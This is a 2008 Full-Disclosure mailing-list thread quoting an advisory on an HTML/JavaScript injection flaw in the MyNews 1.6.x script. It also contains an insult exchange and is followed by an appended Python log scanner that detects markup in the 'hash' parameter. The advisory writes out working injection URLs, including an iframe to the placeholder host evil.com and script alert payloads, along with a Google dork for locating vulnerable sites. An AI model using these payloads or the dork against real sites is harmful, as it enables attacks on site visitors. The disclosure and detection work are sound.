SkyOut is a Fredrick Diggle Sec contributor... We suggest you think very carefully before insulting him further. Consider yourself on the list, reepex.

On Feb 6, 2008 9:57 PM, reepex <[EMAIL PROTECTED]> wrote:
> your 'disclosure' is lame and so is your site. Could you please never email
> here again
>
> On Feb 6, 2008 1:06 PM, SkyOut <[EMAIL PROTECTED]> wrote:
>
> > I know it's basic, but I am a supporter of FD and therefore planetluc.com
> > has to be blamed now! I checked their script MyNews in version 1.6.4 today
> > and then some other versions, all are vulnerable to HTML and JS injection.
> >
> > --- ADVISORY ---
> >
> > -----------------------------
> > || WWW.SMASH-THE-STACK.NET ||
> > -----------------------------
> >
> > || ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability
> >
> > _____________________
> > || 0x00: ABOUT ME
> > || 0x01: DATELINE
> > || 0x02: INFORMATION
> > || 0x03: EXPLOITATION
> > || 0x04: GOOGLE DORK
> > || 0x05: RISK LEVEL
> > ____________________________________________________________
> > ____________________________________________________________
> >
> > _________________
> > || 0x00: ABOUT ME
> >
> > Author: SkyOut
> > Date: February 2008
> > Contact: skyout[-at-]smash-the-stack[-dot-]net
> > Website: http://www.smash-the-stack.net/
> >
> > _________________
> > || 0x01: DATELINE
> >
> > 2008-02-06: Bug found
> > 2008-02-06: Advisory released
> >
> > ____________________
> > || 0x02: INFORMATION
> >
> > The MyNews script by planetluc.com in all versions of the 1.6.X tree is
> > vulnerable to HTML and JS injection due to no sanitation of the "hash"
> > value in combination with the action "admin".
> >
> > _____________________
> > || 0x03: EXPLOITATION
> >
> > No exploit is needed to test this vulnerability. You just need a working
> > web browser.
> >
> > 1: HTML Injection
> >
> > To make an HTML injection, visit the website's main page. The name might
> > differ from the original name "mynews.inc.php", mostly it's called
> > "index.php". Now construct a malformed URL as follows:
> >
> > http://www.example.com/index.php?hash="><iframe src=http://
> > www.evil.com/ height=500px width=500px></iframe><!--&do=admin
> >
> > Of course you can manipulate the values of "height" and "width" like you
> > want to. Do it the way it best fits to your needs!
> >
> > 2: JavaScript Injection
> >
> > JS injection is similar to HTML injection, just that you put a JS code
> > in the "hash" parameter. Let me show you two examples:
> >
> > http://www.example.com/index.php?hash="><script>alert(1337);</
> > script><!--&do=admin
> >
> > or
> >
> > http://www.example.com/index.php?hash="><script>alert("XSS");</
> > script><!--&do=admin
> >
> > Sometimes using strings doesn't work, so test it first!
> >
> > ____________________
> > || 0x04: GOOGLE DORK
> >
> > intext:"powered by MyNews 1.6.*"
> >
> > ___________________
> > || 0x05: RISK LEVEL
> >
> > - LOW - (1/3) -
> >
> > <!> Happy Hacking <!>
> >
> > ____________________________________________________________
> > ____________________________________________________________
> >
> > THE END
> >
> > --- ADVISORY ---
> >
> > Sincerely,
> > SkyOut
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
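
A site running MyNews can check its access logs for the pattern the advisory describes: markup arriving in the `hash` query parameter, usually together with `do=admin`. The following is an added example, not part of the original thread or of MyNews; the Apache-style log format, the sample lines, and the assumption that a legitimate `hash` is a plain alphanumeric token are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate "hash" value is an alphanumeric token (or empty).
SAFE_HASH = re.compile(r"\A[A-Za-z0-9]{0,64}\Z")
# Request line as written by Apache/nginx combined-style access logs.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_hash_requests(log_lines):
    """Return (line_no, with_do_admin, decoded_hash) for every request whose
    "hash" parameter is not a plain token after one round of URL decoding."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        params = parse_qs(query, keep_blank_values=True)
        with_do_admin = "admin" in params.get("do", [])
        for value in params.get("hash", []):
            # Quotes, angle brackets, or leftover '%' (double encoding)
            # all fall outside the allowlist and are reported.
            if not SAFE_HASH.match(value):
                hits.append((line_no, with_do_admin, value))
    return hits


# Constructed sample log lines (documentation IP ranges, inert markup).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2008:13:10:01 +0000] '
    '"GET /index.php?hash=9f2c41ab&do=admin HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2008:13:11:47 +0000] '
    '"GET /index.php?hash=%22%3E%3Cb%3Etest%3C%2Fb%3E&do=admin HTTP/1.1" 200 5391',
    '203.0.113.9 - - [06/Feb/2008:13:12:02 +0000] '
    '"GET /index.php?hash=%2522%253E&do=admin HTTP/1.1" 200 5130',
    '198.51.100.7 - - [06/Feb/2008:13:15:30 +0000] '
    '"GET /index.php?page=2 HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for hit in suspicious_hash_requests(SAMPLE_LOG):
        print(hit)
```

The allowlist reports anything that is not a plain token, so percent-encoded and double-encoded variants are caught without enumerating individual tags.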
